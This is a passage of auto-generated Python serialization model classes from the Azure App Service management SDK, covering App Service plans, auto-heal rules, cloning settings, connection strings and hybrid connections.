'suspended': {'key': 'properties.suspended', 'type': 'bool'},
'dynamic_cache_enabled': {'key': 'properties.dynamicCacheEnabled', 'type': 'bool'},
'cluster_settings': {'key': 'properties.clusterSettings', 'type': '[NameValuePair]'},
'user_whitelisted_ip_ranges': {'key': 'properties.userWhitelistedIpRanges', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(AppServiceEnvironmentResource, self).__init__(**kwargs)
self.name_properties_name = kwargs.get('name_properties_name', None)
self.location_properties_location = kwargs.get('location_properties_location', None)
self.provisioning_state = None
self.status = None
self.vnet_name = kwargs.get('vnet_name', None)
self.vnet_resource_group_name = kwargs.get('vnet_resource_group_name', None)
self.vnet_subnet_name = kwargs.get('vnet_subnet_name', None)
self.virtual_network = kwargs.get('virtual_network', None)
self.internal_load_balancing_mode = kwargs.get('internal_load_balancing_mode', None)
self.multi_size = kwargs.get('multi_size', None)
self.multi_role_count = kwargs.get('multi_role_count', None)
self.worker_pools = kwargs.get('worker_pools', None)
self.ipssl_address_count = kwargs.get('ipssl_address_count', None)
self.database_edition = None
self.database_service_objective = None
self.upgrade_domains = None
self.subscription_id = None
self.dns_suffix = kwargs.get('dns_suffix', None)
self.last_action = None
self.last_action_result = None
self.allowed_multi_sizes = None
self.allowed_worker_sizes = None
self.maximum_number_of_machines = None
self.vip_mappings = None
self.environment_capacities = None
self.network_access_control_list = kwargs.get('network_access_control_list', None)
self.environment_is_healthy = None
self.environment_status = None
self.resource_group = None
self.front_end_scale_factor = kwargs.get('front_end_scale_factor', None)
self.default_front_end_scale_factor = None
self.api_management_account_id = kwargs.get('api_management_account_id', None)
self.suspended = kwargs.get('suspended', None)
self.dynamic_cache_enabled = kwargs.get('dynamic_cache_enabled', None)
self.cluster_settings = kwargs.get('cluster_settings', None)
self.user_whitelisted_ip_ranges = kwargs.get('user_whitelisted_ip_ranges', None)
class AppServicePlan(Resource):
"""App Service plan.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:param location: Required. Resource Location.
:type location: str
:ivar type: Resource type.
:vartype type: str
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param sku: Description of a SKU for a scalable resource.
:type sku: ~azure.mgmt.web.v2016_09_01.models.SkuDescription
:param name_properties_name: Name for the App Service plan.
:type name_properties_name: str
:param worker_tier_name: Target worker tier assigned to the App Service plan.
:type worker_tier_name: str
:ivar status: App Service plan status. Possible values include: "Ready", "Pending", "Creating".
:vartype status: str or ~azure.mgmt.web.v2016_09_01.models.StatusOptions
:ivar subscription: App Service plan subscription.
:vartype subscription: str
:param admin_site_name: App Service plan administration site.
:type admin_site_name: str
:param hosting_environment_profile: Specification for the App Service Environment to use for
the App Service plan.
:type hosting_environment_profile: ~azure.mgmt.web.v2016_09_01.models.HostingEnvironmentProfile
:ivar maximum_number_of_workers: Maximum number of instances that can be assigned to this App
Service plan.
:vartype maximum_number_of_workers: int
:ivar geo_region: Geographical location for the App Service plan.
:vartype geo_region: str
:param per_site_scaling: If :code:`<code>true</code>`, apps assigned to this App Service plan
can be scaled independently.
If :code:`<code>false</code>`, apps assigned to this App Service plan will scale to all
instances of the plan.
:type per_site_scaling: bool
:ivar number_of_sites: Number of apps assigned to this App Service plan.
:vartype number_of_sites: int
:param is_spot: If :code:`<code>true</code>`, this App Service Plan owns spot instances.
:type is_spot: bool
:param spot_expiration_time: The time when the server farm expires. Valid only if it is a spot
server farm.
:type spot_expiration_time: ~datetime.datetime
:ivar resource_group: Resource group of the App Service plan.
:vartype resource_group: str
:param reserved: If Linux app service plan :code:`<code>true</code>`,
:code:`<code>false</code>` otherwise.
:type reserved: bool
:param target_worker_count: Scaling worker count.
:type target_worker_count: int
:param target_worker_size_id: Scaling worker size ID.
:type target_worker_size_id: int
:ivar provisioning_state: Provisioning state of the App Service Environment. Possible values
include: "Succeeded", "Failed", "Canceled", "InProgress", "Deleting".
:vartype provisioning_state: str or ~azure.mgmt.web.v2016_09_01.models.ProvisioningState
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'location': {'required': True},
'type': {'readonly': True},
'status': {'readonly': True},
'subscription': {'readonly': True},
'maximum_number_of_workers': {'readonly': True},
'geo_region': {'readonly': True},
'number_of_sites': {'readonly': True},
'resource_group': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'sku': {'key': 'sku', 'type': 'SkuDescription'},
'name_properties_name': {'key': 'properties.name', 'type': 'str'},
'worker_tier_name': {'key': 'properties.workerTierName', 'type': 'str'},
'status': {'key': 'properties.status', 'type': 'str'},
'subscription': {'key': 'properties.subscription', 'type': 'str'},
'admin_site_name': {'key': 'properties.adminSiteName', 'type': 'str'},
'hosting_environment_profile': {'key': 'properties.hostingEnvironmentProfile', 'type': 'HostingEnvironmentProfile'},
'maximum_number_of_workers': {'key': 'properties.maximumNumberOfWorkers', 'type': 'int'},
'geo_region': {'key': 'properties.geoRegion', 'type': 'str'},
'per_site_scaling': {'key': 'properties.perSiteScaling', 'type': 'bool'},
'number_of_sites': {'key': 'properties.numberOfSites', 'type': 'int'},
'is_spot': {'key': 'properties.isSpot', 'type': 'bool'},
'spot_expiration_time': {'key': 'properties.spotExpirationTime', 'type': 'iso-8601'},
'resource_group': {'key': 'properties.resourceGroup', 'type': 'str'},
'reserved': {'key': 'properties.reserved', 'type': 'bool'},
'target_worker_count': {'key': 'properties.targetWorkerCount', 'type': 'int'},
'target_worker_size_id': {'key': 'properties.targetWorkerSizeId', 'type': 'int'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AppServicePlan, self).__init__(**kwargs)
self.sku = kwargs.get('sku', None)
self.name_properties_name = kwargs.get('name_properties_name', None)
self.worker_tier_name = kwargs.get('worker_tier_name', None)
self.status = None
self.subscription = None
self.admin_site_name = kwargs.get('admin_site_name', None)
self.hosting_environment_profile = kwargs.get('hosting_environment_profile', None)
self.maximum_number_of_workers = None
self.geo_region = None
self.per_site_scaling = kwargs.get('per_site_scaling', False)
self.number_of_sites = None
self.is_spot = kwargs.get('is_spot', None)
self.spot_expiration_time = kwargs.get('spot_expiration_time', None)
self.resource_group = None
self.reserved = kwargs.get('reserved', False)
self.target_worker_count = kwargs.get('target_worker_count', None)
self.target_worker_size_id = kwargs.get('target_worker_size_id', None)
self.provisioning_state = None
class AppServicePlanCollection(msrest.serialization.Model):
"""Collection of App Service plans.
All required parameters must be populated in order to send to Azure.
:param value: Required. Collection of resources.
:type value: list[~azure.mgmt.web.v2016_09_01.models.AppServicePlan]
:param next_link: Link to next page of resources.
:type next_link: str
"""
_validation = {
'value': {'required': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[AppServicePlan]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AppServicePlanCollection, self).__init__(**kwargs)
self.value = kwargs['value']
self.next_link = kwargs.get('next_link', None)
class AppServicePlanPatchResource(ProxyOnlyResource):
"""ARM resource for a app service plan.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:param name_properties_name: Name for the App Service plan.
:type name_properties_name: str
:param worker_tier_name: Target worker tier assigned to the App Service plan.
:type worker_tier_name: str
:ivar status: App Service plan status. Possible values include: "Ready", "Pending", "Creating".
:vartype status: str or ~azure.mgmt.web.v2016_09_01.models.StatusOptions
:ivar subscription: App Service plan subscription.
:vartype subscription: str
:param admin_site_name: App Service plan administration site.
:type admin_site_name: str
:param hosting_environment_profile: Specification for the App Service Environment to use for
the App Service plan.
:type hosting_environment_profile: ~azure.mgmt.web.v2016_09_01.models.HostingEnvironmentProfile
:ivar maximum_number_of_workers: Maximum number of instances that can be assigned to this App
Service plan.
:vartype maximum_number_of_workers: int
:ivar geo_region: Geographical location for the App Service plan.
:vartype geo_region: str
:param per_site_scaling: If :code:`<code>true</code>`, apps assigned to this App Service plan
can be scaled independently.
If :code:`<code>false</code>`, apps assigned to this App Service plan will scale to all
instances of the plan.
:type per_site_scaling: bool
:ivar number_of_sites: Number of apps assigned to this App Service plan.
:vartype number_of_sites: int
:param is_spot: If :code:`<code>true</code>`, this App Service Plan owns spot instances.
:type is_spot: bool
:param spot_expiration_time: The time when the server farm expires. Valid only if it is a spot
server farm.
:type spot_expiration_time: ~datetime.datetime
:ivar resource_group: Resource group of the App Service plan.
:vartype resource_group: str
:param reserved: If Linux app service plan :code:`<code>true</code>`,
:code:`<code>false</code>` otherwise.
:type reserved: bool
:param target_worker_count: Scaling worker count.
:type target_worker_count: int
:param target_worker_size_id: Scaling worker size ID.
:type target_worker_size_id: int
:ivar provisioning_state: Provisioning state of the App Service Environment. Possible values
include: "Succeeded", "Failed", "Canceled", "InProgress", "Deleting".
:vartype provisioning_state: str or ~azure.mgmt.web.v2016_09_01.models.ProvisioningState
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'status': {'readonly': True},
'subscription': {'readonly': True},
'maximum_number_of_workers': {'readonly': True},
'geo_region': {'readonly': True},
'number_of_sites': {'readonly': True},
'resource_group': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'name_properties_name': {'key': 'properties.name', 'type': 'str'},
'worker_tier_name': {'key': 'properties.workerTierName', 'type': 'str'},
'status': {'key': 'properties.status', 'type': 'str'},
'subscription': {'key': 'properties.subscription', 'type': 'str'},
'admin_site_name': {'key': 'properties.adminSiteName', 'type': 'str'},
'hosting_environment_profile': {'key': 'properties.hostingEnvironmentProfile', 'type': 'HostingEnvironmentProfile'},
'maximum_number_of_workers': {'key': 'properties.maximumNumberOfWorkers', 'type': 'int'},
'geo_region': {'key': 'properties.geoRegion', 'type': 'str'},
'per_site_scaling': {'key': 'properties.perSiteScaling', 'type': 'bool'},
'number_of_sites': {'key': 'properties.numberOfSites', 'type': 'int'},
'is_spot': {'key': 'properties.isSpot', 'type': 'bool'},
'spot_expiration_time': {'key': 'properties.spotExpirationTime', 'type': 'iso-8601'},
'resource_group': {'key': 'properties.resourceGroup', 'type': 'str'},
'reserved': {'key': 'properties.reserved', 'type': 'bool'},
'target_worker_count': {'key': 'properties.targetWorkerCount', 'type': 'int'},
'target_worker_size_id': {'key': 'properties.targetWorkerSizeId', 'type': 'int'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AppServicePlanPatchResource, self).__init__(**kwargs)
self.name_properties_name = kwargs.get('name_properties_name', None)
self.worker_tier_name = kwargs.get('worker_tier_name', None)
self.status = None
self.subscription = None
self.admin_site_name = kwargs.get('admin_site_name', None)
self.hosting_environment_profile = kwargs.get('hosting_environment_profile', None)
self.maximum_number_of_workers = None
self.geo_region = None
self.per_site_scaling = kwargs.get('per_site_scaling', False)
self.number_of_sites = None
self.is_spot = kwargs.get('is_spot', None)
self.spot_expiration_time = kwargs.get('spot_expiration_time', None)
self.resource_group = None
self.reserved = kwargs.get('reserved', False)
self.target_worker_count = kwargs.get('target_worker_count', None)
self.target_worker_size_id = kwargs.get('target_worker_size_id', None)
self.provisioning_state = None
class AutoHealActions(msrest.serialization.Model):
"""Actions which to take by the auto-heal module when a rule is triggered.
:param action_type: Predefined action to be taken. Possible values include: "Recycle",
"LogEvent", "CustomAction".
:type action_type: str or ~azure.mgmt.web.v2016_09_01.models.AutoHealActionType
:param custom_action: Custom action to be taken.
:type custom_action: ~azure.mgmt.web.v2016_09_01.models.AutoHealCustomAction
:param min_process_execution_time: Minimum time the process must execute
before taking the action.
:type min_process_execution_time: str
"""
_attribute_map = {
'action_type': {'key': 'actionType', 'type': 'str'},
'custom_action': {'key': 'customAction', 'type': 'AutoHealCustomAction'},
'min_process_execution_time': {'key': 'minProcessExecutionTime', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AutoHealActions, self).__init__(**kwargs)
self.action_type = kwargs.get('action_type', None)
self.custom_action = kwargs.get('custom_action', None)
self.min_process_execution_time = kwargs.get('min_process_execution_time', None)
class AutoHealCustomAction(msrest.serialization.Model):
"""Custom action to be executed
when an auto heal rule is triggered.
:param exe: Executable to be run.
:type exe: str
:param parameters: Parameters for the executable.
:type parameters: str
"""
_attribute_map = {
'exe': {'key': 'exe', 'type': 'str'},
'parameters': {'key': 'parameters', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AutoHealCustomAction, self).__init__(**kwargs)
self.exe = kwargs.get('exe', None)
self.parameters = kwargs.get('parameters', None)
class AutoHealRules(msrest.serialization.Model):
"""Rules that can be defined for auto-heal.
:param triggers: Conditions that describe when to execute the auto-heal actions.
:type triggers: ~azure.mgmt.web.v2016_09_01.models.AutoHealTriggers
:param actions: Actions to be executed when a rule is triggered.
:type actions: ~azure.mgmt.web.v2016_09_01.models.AutoHealActions
"""
_attribute_map = {
'triggers': {'key': 'triggers', 'type': 'AutoHealTriggers'},
'actions': {'key': 'actions', 'type': 'AutoHealActions'},
}
def __init__(
self,
**kwargs
):
super(AutoHealRules, self).__init__(**kwargs)
self.triggers = kwargs.get('triggers', None)
self.actions = kwargs.get('actions', None)
class AutoHealTriggers(msrest.serialization.Model):
"""Triggers for auto-heal.
:param requests: A rule based on total requests.
:type requests: ~azure.mgmt.web.v2016_09_01.models.RequestsBasedTrigger
:param private_bytes_in_kb: A rule based on private bytes.
:type private_bytes_in_kb: int
:param status_codes: A rule based on status codes.
:type status_codes: list[~azure.mgmt.web.v2016_09_01.models.StatusCodesBasedTrigger]
:param slow_requests: A rule based on request execution time.
:type slow_requests: ~azure.mgmt.web.v2016_09_01.models.SlowRequestsBasedTrigger
"""
_attribute_map = {
'requests': {'key': 'requests', 'type': 'RequestsBasedTrigger'},
'private_bytes_in_kb': {'key': 'privateBytesInKB', 'type': 'int'},
'status_codes': {'key': 'statusCodes', 'type': '[StatusCodesBasedTrigger]'},
'slow_requests': {'key': 'slowRequests', 'type': 'SlowRequestsBasedTrigger'},
}
def __init__(
self,
**kwargs
):
super(AutoHealTriggers, self).__init__(**kwargs)
self.requests = kwargs.get('requests', None)
self.private_bytes_in_kb = kwargs.get('private_bytes_in_kb', None)
self.status_codes = kwargs.get('status_codes', None)
self.slow_requests = kwargs.get('slow_requests', None)
class Capability(msrest.serialization.Model):
"""Describes the capabilities/features allowed for a specific SKU.
:param name: Name of the SKU capability.
:type name: str
:param value: Value of the SKU capability.
:type value: str
:param reason: Reason of the SKU capability.
:type reason: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
'reason': {'key': 'reason', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Capability, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.value = kwargs.get('value', None)
self.reason = kwargs.get('reason', None)
class CloningInfo(msrest.serialization.Model):
"""Information needed for cloning operation.
All required parameters must be populated in order to send to Azure.
:param correlation_id: Correlation ID of cloning operation. This ID ties multiple cloning
operations
together to use the same snapshot.
:type correlation_id: str
:param overwrite: :code:`<code>true</code>` to overwrite destination app; otherwise,
:code:`<code>false</code>`.
:type overwrite: bool
:param clone_custom_host_names: :code:`<code>true</code>` to clone custom hostnames from source
app; otherwise, :code:`<code>false</code>`.
:type clone_custom_host_names: bool
:param clone_source_control: :code:`<code>true</code>` to clone source control from source app;
otherwise, :code:`<code>false</code>`.
:type clone_source_control: bool
:param source_web_app_id: Required. ARM resource ID of the source app. App resource ID is of
the form
/subscriptions/{subId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{siteName}
for production slots and
/subscriptions/{subId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/sites/{siteName}/slots/{slotName}
for other slots.
:type source_web_app_id: str
:param hosting_environment: App Service Environment.
:type hosting_environment: str
:param app_settings_overrides: Application setting overrides for cloned app. If specified,
these settings override the settings cloned
from source app. Otherwise, application settings from source app are retained.
:type app_settings_overrides: dict[str, str]
:param configure_load_balancing: :code:`<code>true</code>` to configure load balancing for
source and destination app.
:type configure_load_balancing: bool
:param traffic_manager_profile_id: ARM resource ID of the Traffic Manager profile to use, if it
exists. Traffic Manager resource ID is of the form
/subscriptions/{subId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/trafficManagerProfiles/{profileName}.
:type traffic_manager_profile_id: str
:param traffic_manager_profile_name: Name of Traffic Manager profile to create. This is only
needed if Traffic Manager profile does not already exist.
:type traffic_manager_profile_name: str
:param ignore_quotas: :code:`<code>true</code>` if quotas should be ignored; otherwise,
:code:`<code>false</code>`.
:type ignore_quotas: bool
"""
_validation = {
'source_web_app_id': {'required': True},
}
_attribute_map = {
'correlation_id': {'key': 'correlationId', 'type': 'str'},
'overwrite': {'key': 'overwrite', 'type': 'bool'},
'clone_custom_host_names': {'key': 'cloneCustomHostNames', 'type': 'bool'},
'clone_source_control': {'key': 'cloneSourceControl', 'type': 'bool'},
'source_web_app_id': {'key': 'sourceWebAppId', 'type': 'str'},
'hosting_environment': {'key': 'hostingEnvironment', 'type': 'str'},
'app_settings_overrides': {'key': 'appSettingsOverrides', 'type': '{str}'},
'configure_load_balancing': {'key': 'configureLoadBalancing', 'type': 'bool'},
'traffic_manager_profile_id': {'key': 'trafficManagerProfileId', 'type': 'str'},
'traffic_manager_profile_name': {'key': 'trafficManagerProfileName', 'type': 'str'},
'ignore_quotas': {'key': 'ignoreQuotas', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(CloningInfo, self).__init__(**kwargs)
self.correlation_id = kwargs.get('correlation_id', None)
self.overwrite = kwargs.get('overwrite', None)
self.clone_custom_host_names = kwargs.get('clone_custom_host_names', None)
self.clone_source_control = kwargs.get('clone_source_control', None)
self.source_web_app_id = kwargs['source_web_app_id']
self.hosting_environment = kwargs.get('hosting_environment', None)
self.app_settings_overrides = kwargs.get('app_settings_overrides', None)
self.configure_load_balancing = kwargs.get('configure_load_balancing', None)
self.traffic_manager_profile_id = kwargs.get('traffic_manager_profile_id', None)
self.traffic_manager_profile_name = kwargs.get('traffic_manager_profile_name', None)
self.ignore_quotas = kwargs.get('ignore_quotas', None)
class ConnStringInfo(msrest.serialization.Model):
"""Database connection string information.
:param name: Name of connection string.
:type name: str
:param connection_string: Connection string value.
:type connection_string: str
:param type: Type of database. Possible values include: "MySql", "SQLServer", "SQLAzure",
"Custom", "NotificationHub", "ServiceBus", "EventHub", "ApiHub", "DocDb", "RedisCache",
"PostgreSQL".
:type type: str or ~azure.mgmt.web.v2016_09_01.models.ConnectionStringType
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'connection_string': {'key': 'connectionString', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ConnStringInfo, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.connection_string = kwargs.get('connection_string', None)
self.type = kwargs.get('type', None)
class CorsSettings(msrest.serialization.Model):
"""Cross-Origin Resource Sharing (CORS) settings for the app.
:param allowed_origins: Gets or sets the list of origins that should be allowed to make cross-
origin
calls (for example: http://example.com:12345). Use "*" to allow all.
:type allowed_origins: list[str]
"""
_attribute_map = {
'allowed_origins': {'key': 'allowedOrigins', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(CorsSettings, self).__init__(**kwargs)
self.allowed_origins = kwargs.get('allowed_origins', None)
class CsmUsageQuota(msrest.serialization.Model):
"""Usage of the quota resource.
:param unit: Units of measurement for the quota resource.
:type unit: str
:param next_reset_time: Next reset time for the resource counter.
:type next_reset_time: ~datetime.datetime
:param current_value: The current value of the resource counter.
:type current_value: long
:param limit: The resource limit.
:type limit: long
:param name: Quota name.
:type name: ~azure.mgmt.web.v2016_09_01.models.LocalizableString
"""
_attribute_map = {
'unit': {'key': 'unit', 'type': 'str'},
'next_reset_time': {'key': 'nextResetTime', 'type': 'iso-8601'},
'current_value': {'key': 'currentValue', 'type': 'long'},
'limit': {'key': 'limit', 'type': 'long'},
'name': {'key': 'name', 'type': 'LocalizableString'},
}
def __init__(
self,
**kwargs
):
super(CsmUsageQuota, self).__init__(**kwargs)
self.unit = kwargs.get('unit', None)
self.next_reset_time = kwargs.get('next_reset_time', None)
self.current_value = kwargs.get('current_value', None)
self.limit = kwargs.get('limit', None)
self.name = kwargs.get('name', None)
class CsmUsageQuotaCollection(msrest.serialization.Model):
"""Collection of CSM usage quotas.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param value: Required. Collection of resources.
:type value: list[~azure.mgmt.web.v2016_09_01.models.CsmUsageQuota]
:ivar next_link: Link to next page of resources.
:vartype next_link: str
"""
_validation = {
'value': {'required': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[CsmUsageQuota]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(CsmUsageQuotaCollection, self).__init__(**kwargs)
self.value = kwargs['value']
self.next_link = None
class ErrorEntity(msrest.serialization.Model):
"""Body of the error response returned from the API.
:param extended_code: Type of error.
:type extended_code: str
:param message_template: Message template.
:type message_template: str
:param parameters: Parameters for the template.
:type parameters: list[str]
:param inner_errors: Inner errors.
:type inner_errors: list[~azure.mgmt.web.v2016_09_01.models.ErrorEntity]
:param code: Basic error code.
:type code: str
:param message: Any details of the error.
:type message: str
"""
_attribute_map = {
'extended_code': {'key': 'extendedCode', 'type': 'str'},
'message_template': {'key': 'messageTemplate', 'type': 'str'},
'parameters': {'key': 'parameters', 'type': '[str]'},
'inner_errors': {'key': 'innerErrors', 'type': '[ErrorEntity]'},
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ErrorEntity, self).__init__(**kwargs)
self.extended_code = kwargs.get('extended_code', None)
self.message_template = kwargs.get('message_template', None)
self.parameters = kwargs.get('parameters', None)
self.inner_errors = kwargs.get('inner_errors', None)
self.code = kwargs.get('code', None)
self.message = kwargs.get('message', None)
class Experiments(msrest.serialization.Model):
"""Routing rules in production experiments.
:param ramp_up_rules: List of ramp-up rules.
:type ramp_up_rules: list[~azure.mgmt.web.v2016_09_01.models.RampUpRule]
"""
_attribute_map = {
'ramp_up_rules': {'key': 'rampUpRules', 'type': '[RampUpRule]'},
}
def __init__(
self,
**kwargs
):
super(Experiments, self).__init__(**kwargs)
self.ramp_up_rules = kwargs.get('ramp_up_rules', None)
class HandlerMapping(msrest.serialization.Model):
"""The IIS handler mappings used to define which handler processes HTTP requests with certain extension.
For example, it is used to configure php-cgi.exe process to handle all HTTP requests with *.php extension.
:param extension: Requests with this extension will be handled using the specified FastCGI
application.
:type extension: str
:param script_processor: The absolute path to the FastCGI application.
:type script_processor: str
:param arguments: Command-line arguments to be passed to the script processor.
:type arguments: str
"""
_attribute_map = {
'extension': {'key': 'extension', 'type': 'str'},
'script_processor': {'key': 'scriptProcessor', 'type': 'str'},
'arguments': {'key': 'arguments', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(HandlerMapping, self).__init__(**kwargs)
self.extension = kwargs.get('extension', None)
self.script_processor = kwargs.get('script_processor', None)
self.arguments = kwargs.get('arguments', None)
class HostingEnvironmentDiagnostics(msrest.serialization.Model):
"""Diagnostics for an App Service Environment.
:param name: Name/identifier of the diagnostics.
:type name: str
:param diagnosics_output: Diagnostics output.
:type diagnosics_output: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'diagnosics_output': {'key': 'diagnosicsOutput', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(HostingEnvironmentDiagnostics, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.diagnosics_output = kwargs.get('diagnosics_output', None)
class HostingEnvironmentProfile(msrest.serialization.Model):
"""Specification for an App Service Environment to use for this resource.
Variables are only populated by the server, and will be ignored when sending a request.
:param id: Resource ID of the App Service Environment.
:type id: str
:ivar name: Name of the App Service Environment.
:vartype name: str
:ivar type: Resource type of the App Service Environment.
:vartype type: str
"""
_validation = {
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(HostingEnvironmentProfile, self).__init__(**kwargs)
self.id = kwargs.get('id', None)
self.name = None
self.type = None
class HostNameSslState(msrest.serialization.Model):
"""SSL-enabled hostname.
:param name: Hostname.
:type name: str
:param ssl_state: SSL type. Possible values include: "Disabled", "SniEnabled",
"IpBasedEnabled".
:type ssl_state: str or ~azure.mgmt.web.v2016_09_01.models.SslState
:param virtual_ip: Virtual IP address assigned to the hostname if IP based SSL is enabled.
:type virtual_ip: str
:param thumbprint: SSL certificate thumbprint.
:type thumbprint: str
:param to_update: Set to :code:`<code>true</code>` to update existing hostname.
:type to_update: bool
:param host_type: Indicates whether the hostname is a standard or repository hostname. Possible
values include: "Standard", "Repository".
:type host_type: str or ~azure.mgmt.web.v2016_09_01.models.HostType
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'ssl_state': {'key': 'sslState', 'type': 'str'},
'virtual_ip': {'key': 'virtualIP', 'type': 'str'},
'thumbprint': {'key': 'thumbprint', 'type': 'str'},
'to_update': {'key': 'toUpdate', 'type': 'bool'},
'host_type': {'key': 'hostType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(HostNameSslState, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.ssl_state = kwargs.get('ssl_state', None)
self.virtual_ip = kwargs.get('virtual_ip', None)
self.thumbprint = kwargs.get('thumbprint', None)
self.to_update = kwargs.get('to_update', None)
self.host_type = kwargs.get('host_type', None)
class HybridConnection(ProxyOnlyResource):
"""Hybrid Connection contract. This is used to configure a Hybrid Connection.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:param service_bus_namespace: The name of the Service Bus namespace.
:type service_bus_namespace: str
:param relay_name: The name of the Service Bus relay.
:type relay_name: str
:param relay_arm_uri: The ARM URI to the Service Bus relay.
:type relay_arm_uri: str
:param hostname: The hostname of the endpoint.
:type hostname: str
:param port: The port of the endpoint.
:type port: int
:param send_key_name: The name of the Service Bus key which has Send permissions. This is used
to authenticate to Service Bus.
:type send_key_name: str
:param send_key_value: The value of the Service Bus key. This is used to authenticate to
Service Bus. In ARM this key will not be returned
normally, use the POST /listKeys API instead.
:type send_key_value: str
:param service_bus_suffix: The suffix for the service bus endpoint. By default this is
.servicebus.windows.net.
:type service_bus_suffix: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'service_bus_namespace': {'key': 'properties.serviceBusNamespace', 'type': 'str'},
'relay_name': {'key': 'properties.relayName', 'type': 'str'},
'relay_arm_uri': {'key': 'properties.relayArmUri', 'type': 'str'},
'hostname': {'key': 'properties.hostname', 'type': 'str'},
'port': {'key': 'properties.port', 'type': 'int'},
'send_key_name': {'key': 'properties.sendKeyName', 'type': 'str'},
'send_key_value': {'key': 'properties.sendKeyValue', 'type': 'str'},
'service_bus_suffix': {'key': 'properties.serviceBusSuffix', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(HybridConnection, self).__init__(**kwargs)
self.service_bus_namespace = kwargs.get('service_bus_namespace', None)
self.relay_name = kwargs.get('relay_name', None)
self.relay_arm_uri = kwargs.get('relay_arm_uri', None)
self.hostname = kwargs.get('hostname', None)
self.port = kwargs.get('port', None)
self.send_key_name = kwargs.get('send_key_name', None)
self.send_key_value = kwargs.get('send_key_value', None)
self.service_bus_suffix = kwargs.get('service_bus_suffix', None)
class HybridConnectionCollection(msrest.serialization.Model):
"""Collection of hostname bindings.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param value: Required. Collection of resources.
:type value: list[~azure.mgmt.web.v2016_09_01.models.HybridConnection]
:ivar next_link: Link to next page of resources.
:vartype next_link: str
"""
_validation = {
'value': {'required': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[HybridConnection]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(HybridConnectionCollection, self).__init__(**kwargs)
self.value = kwargs['value']
self.next_link = None
class HybridConnectionKey(ProxyOnlyResource):
"""Hybrid Connection key contract. This has the send key name and value for a Hybrid Connection.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:ivar send_key_name: The name of the send key.
:vartype send_key_name: str
:ivar send_key_value: The value of the send key.
:vartype send_key_value: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
